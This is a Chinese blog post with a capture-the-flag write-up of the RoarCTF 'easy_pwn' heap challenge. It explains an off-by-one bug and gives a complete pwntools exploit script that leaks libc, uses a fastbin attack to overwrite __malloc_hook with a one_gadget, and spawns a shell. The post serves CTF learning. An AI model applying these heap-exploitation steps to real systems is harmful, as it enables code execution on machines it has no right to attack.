RoarCTF easy_pwn writeup

最新推荐文章于 2020-12-07 22:07:18 发布
最新推荐文章于 2020-12-07 22:07:18 发布
阅读量3k 收藏 2
点赞数 2
分类专栏: PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43189757/article/details/102537485
版权

漏洞点:
在这里插入图片描述
在write note 中,如果再输入一次size的大小比创建note时的大小的差值为10, 则读入的数据会比chunk的size多一,也就造成了off-by-one漏洞

漏洞利用思路:
大体路线:
1. 修改chunk1 的size为0xf1

2. 修改chunk3的size为0xa1, 之后free掉, 再create一个size为0x20 的chunk,由于修改了chunk3的size, 所以分配的时候会从unsortedbin中的chunk切割一部分,剩下的那部分还会留在unsortedbin中,fd, bk指针依旧指向libc地址,所以可以通过利用chunk4的指针来泄露libc地址

3. free掉chunk1,这样chunk1也会进入unsortedbin
在这里插入图片描述
之后crate一个大小为0xf0的chunk, 由于本题用的calloc函数,所以再创建chunk的时候会初始化,chunk3包含再chunk1中,所以此时unsortedbin中为空

4. 到了这步已经有一块0xf0的内存的内容可以控制,接下来就是通过fastbin attack来覆写__malloc_hook 为one_gadget , 再就是这题的one_gadget 全部失效,所以要利用realloc来调整栈环境来使one_gadget 变得有效

其它细节

fastbin中的chunk在创建或删除的时候都会检查size是否符合大小,在free的时候会检查下下个chunk的标志位检查下一个相邻的标志位是否为0,所以伪造chunk的时候相关数据也要伪造好

EXP:

from pwn import *
import struct

context(arch='amd64', os='linux', log_level='debug')

debug = 0
d = 0

if debug == 0:
	p = process("./easy_pwn")
	if d == 1:
		gdb.attach(p)
else:
	p = remote("39.97.182.233", 33420)

def create(size):
	p.sendlineafter("choice: ", str(1))

	p.sendlineafter("size: ", str(size))

def write(index, size, content):
	p.sendlineafter("choice: ", str(2))

	p.sendlineafter("index: ", str(index))
	p.sendlineafter("size: ", str(size))
	p.sendlineafter("content: ", content)

def free(index):
	p.sendlineafter("choice: ", str(3))

	p.sendlineafter("index: ", str(index))

def show(index):
	p.sendlineafter("choice: ", str(4))

	p.sendlineafter("index: ", str(index))

create(0x18)  #0

create(0x18)  #1

create(0x18)  #2

create(0x18)  #3

create(0x18)  #4

create(0x18)  #5

create(0x18)  #6

create(0x18)  #7

create(0x18)  #8

create(0x18)  #9

create(0x18)  #10
write(10, 0x10, p64(0x91) + p64(0x21))

create(0x18) #11
write(11, 0x10, 'a'*8 + p64(0x21))

write(0, 0x18 + 10, 'a'*0x18 + '\xf1')  #chun1 size -> 0xf1

write(8, 0x10, p64(0) + p64(0x21))

write(9, 0x10, p64(0) + p64(0x21))

write(2, 0x18 + 10, 'a'*0x18 + '\xa1')

free(3)

create(0x18)  

show(4)

p.recvuntil("content: ")
leak = p.recvline()[:8]
print "leak-> " + leak

libc_addr = struct.unpack("<Q", leak)[0]
print "libc_addr-> " + hex(libc_addr)

libc_base = libc_addr - (0x7fb29d5fab78 - 0x7fb29d236000)
print "libc_base-> " + hex(libc_base)

free(1)

create(0xe8)

payload = 'a'*0x10 + p64(0) + p64(0x71)
payload += 'a'*0x10 + p64(0) + p64(0x21)
payload += 'a'*0x10 + p64(0) + p64(0x21)
payload += 'a'*0x10 + p64(0) + p64(0x21)
payload += 'a'*8 + p64(0x21)
payload += 'a'*0x18 + p64(0x21)
write(1, 0xe8, payload + 'a'*(0xe8 - len(payload)))

free(2)

libc = ELF("/lib/x86_64-linux-gnu/libc-2.23.so")

malloc_hook = libc_base + libc.symbols['__malloc_hook']
print "malloc_hook-> " + hex(malloc_hook)

realloc = libc_base + libc.symbols['__libc_realloc']
print "realloc-> " + hex(realloc)

one_gadget = libc_base + 0xf02a4
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
  rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
  [rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
  [rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:
  [rsp+0x70] == NULL
'''
payload = 'a'*0x10 + p64(0) + p64(0x71) + p64(malloc_hook - 0x23)
write(1, len(payload), payload)

create(0x68)

create(0x68)

payload = 'a'*(0x13 - 0x8) + p64(one_gadget) + p64(realloc+13)
write(12, len(payload), payload)

p.sendlineafter("choice: ", str(1))
p.sendlineafter("size: ", str(1))

p.interactive()

结果:
在这里插入图片描述

苍崎青子
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-pwn pwn-100(ROP)
菜的只能随便写写博客
11-05 2936
此题是LCTF 2016年的pwn100 参考文章:https://bbs.ichunqiu.com/forum.php?mod=viewthread&tid=42933&ctid=157 0x01 文件分析 64位elf 无stack 无PIE   0x02 运行分析  看起来像一个无限循环,不断接收输入。   0x03 静态分析 main: sub_40068E: ...
CTF-浅尝64位栈溢出PWN
BadRer的博客
06-04 1万+
干了一早上终于把这道’难题’做出来了,实在是不容易。头一次完完全全的做出64位的pwn题,如果就栈溢出来说的话,其实感觉和32位的也差不多。至少这方面没有遇到太大的困难,做64位的题对汇编指令的要求就更高了。正好一边做题,一边多学点汇编。 收获是很大的。正文刚开始被一个逻辑漏洞cmp给卡着,一直没有跳到真正产生漏洞的地方,好不容易跳过去了,结果被我自己坑了(写脚本的时候,没有考虑缓冲区的影响,经常
2020ROARCTF-没人比我更懂签到题和问卷题队伍部分WP
晚安這個未知的世界
12-07 2056
前言 这次比赛我队伍就排第19名,感激队友们直接把我带飞了,真的很感激我队友那天晚上一声不出给我解开了两道web题,真的让我惊讶了,真的太强了,但是由于我这次没注意到细节,给队友拖后腿了,忘记了虚拟机之前移除了声卡和调了静音,这样MISC第三题一血就这样离我而去了。。。。呜呜呜 MISC——签到题 查看源码,有提示/?url,猜测是ssrf,利用file协议读取/www/html/index.php源码,发现过滤了flag,可以用二次编码直接绕过读取flag ?url=file:///%2566lag M
roarctf_2019_easy_pwn
qq_42728977的博客
04-11 484
考点:extented chunk unsorted bin attach 参考链接 参考链接
BUUCTF逆向题练习记录(wp) --(3)WUSTCTF2020&&level1-4已完成
Air_cat的博客
08-28 451
注:funnyre待我搞懂angr后来解 WUSTCTF2020-level1 解密嗷 hexData = [0, 198 , 232 , 816 , 200 , 1536 , 300 , 6144 , 984 , 51200 , 570 , 92160 , 1200
PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机
07-14
pwm波输出,实现数字舵机的控制,完成一些简单的电机控制问题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
PWM.rar_PWN
09-23
在本例中,"PWM.rar_PWN" 指的可能是一个与电子工程或编程相关的项目,尤其是针对硬件控制的场景,如亮度调节和直流电机转速控制。 在电子领域,PWM 通过改变脉冲宽度来模拟不同的电压水平。具体来说,它发送一系列...
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出这是一个关于 "AVR系列单片机Mage8PWM脉冲输出程序" 的资源。这意味着主要关注的是 AVR 系列...
pwm.zip_PIC_PWN
09-14
标题"PWM.zip_PIC_PWN"暗示了这是一个与微控制器Pic相关的项目,主要涉及的是脉宽调制(PWM)技术的汇编语言源代码。在嵌入式系统中,PIC微控制器是广泛应用的一种微处理器,尤其在控制和信号处理任务中。而PWM是一...
SDUT_CTF_WEB题目writeup
至臻求学,胸怀云月
10-08 4692
平台链接http://sctf.sdutislab.cn/challenges 闲的没事做了做实验室自己搭的平台,把web题目writeup放出来签到题右键查看源代码芝麻开门 输入口令:zhimakaimen 那就输呗 结果发现 zhimakaimen是11位,但是输入框最大允许输入10位 f12改一下前端验证把最后一个n输进去,flag就出来了 层层递进看源代码之后,iframe奇怪!
数字经济云安全共测大赛 amazon writeup
qq_43189757的博客
09-26 342
漏洞点: 在进行free操作后没有把chunk指针置为0 所以存在UAF漏洞 思路: 泄露libc地址: 泄露libc地址比较简单,由于题目限定输入的size范围要小于0x100, 所以无法创建一个大小可以直接放入unsortedbin中的chunk, 可以先填满tchachebin, 然后在free一个chunk,这个chunk便会进入unosrtedbin 这是chunk的fd变指向了lib...
BugkuCTF逆向EASY_RE题解
Air_cat的博客
06-17 2039
题目链接:https://ctf.bugku.com/challenges#Easy_Re 港道理,这道题对逆向新人来说有一个比较奇特的点,虽然很简单,但想必开始的时候会难到不少新朋友,我们就来看看这题是怎么回事 这种题盲猜是用od跑,那么用od(记住是中文搜索)打开试试: 很显然我们要对付的就是头顶那些代码了! 那么和我们之前做的水题不同,首先这里我们看不到flag存储的地方,然后跳进去看看:...
CTF之隐写术破解总结
热门推荐
小伟锅的博客
08-26 4万+
一、隐写术可以利用图片、音频、视频为载体将数据隐藏在其中,将数据隐写到图像中较为常见。 二、图像隐写术进行数据隐写分为以下几类: 1.在图片右击-属性-详细信息中隐藏数据信息 2.将数据类型进行改写(rar类型数据 将其改写成jpg格式) 3.根据各种类型图像的固定格式,隐藏数据 修改图像开始标志,改变其原有图像格式; 在图像结束标志后加入数据; 在图
Exp10 Final “西普杯”北京天津CTF预选赛真题 writeup
a569847381的博客
06-11 1208
写在前面: 1.为什么做免考? 主要是想挑战一下自己,提高一点能力,之前在学校信安大赛的时候就对这方面有一些涉猎,希望能够通过完成这两套题目,水平得到进一步的提高。也希望能够给下一届参加信安大赛的学弟学妹们一些方法上的启发。 2.免考内容: 1.学校信安大赛网络攻防三等奖 2.西普杯北京+天津预算选赛CTF12道真题writeup 在这里我选用的是西普杯北京+天津预算选赛的题...
[BUUCTF] [PWN] test_your_nc
Stan冲冲冲
09-18 348
nc node3.buuoj.cn 25795 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vkzXFCeo-1600426423286)(https://i.loli.net/2020/09/18/NACD2xQiStRhu5T.png)] 直接nc过去,ls即可看到文件,发现flag,cat即可发现flag cat flag ...
roarctf_2019_easy_pwn[off by one]
、moddemod
07-01 339
溢出一个字节,修改size域 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() def create_note(size, ): p.sendlineafter('choice:', str(1)) p.sendlineafter('size:', str(size)) def write_note(index,...
Roar CTF 2019 坦克大战 Writeup
Secz的博客
10-15 2000
下载压缩包 解压看到 可知该游戏由Unity3D编写,由于没有相关逆向经验,上网查阅得知游戏代码部分都在Assembly-CSharp.dll文件中,通过dnspy可以打开此类型的dll. 直接查看跟题目相关的函数,在MapManager下有名为WinGame的函数.源码如下 // MapManager // Token: 0x06000029 RID: 41 RVA: 0x00003050 ...
实验吧CTF逆向题目easycreakme题解
iqiqiya的博客
12-24 3307
在实验吧看到这道题 题目链接 http://ctf5.shiyanbar.com/reverse/easycreakme/Easy_CrackMe.exe.bak   我是直接用的脱壳后的 https://pan.baidu.com/s/1qYLZaXm      IDA载入很清楚的可以发现先后与a,5y,R3versing,E进行比较 若都
xdctf2015_pwn200
最新发布
09-03
xdctf2015_pwn200是一道CTF比赛中的题目,是一个二进制漏洞利用题目。从代码中可以看出,它利用了一个栈溢出漏洞来实现攻击。在攻击过程中,首先使用write函数的got地址来泄露出libc中write函数的真实地址,然后通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值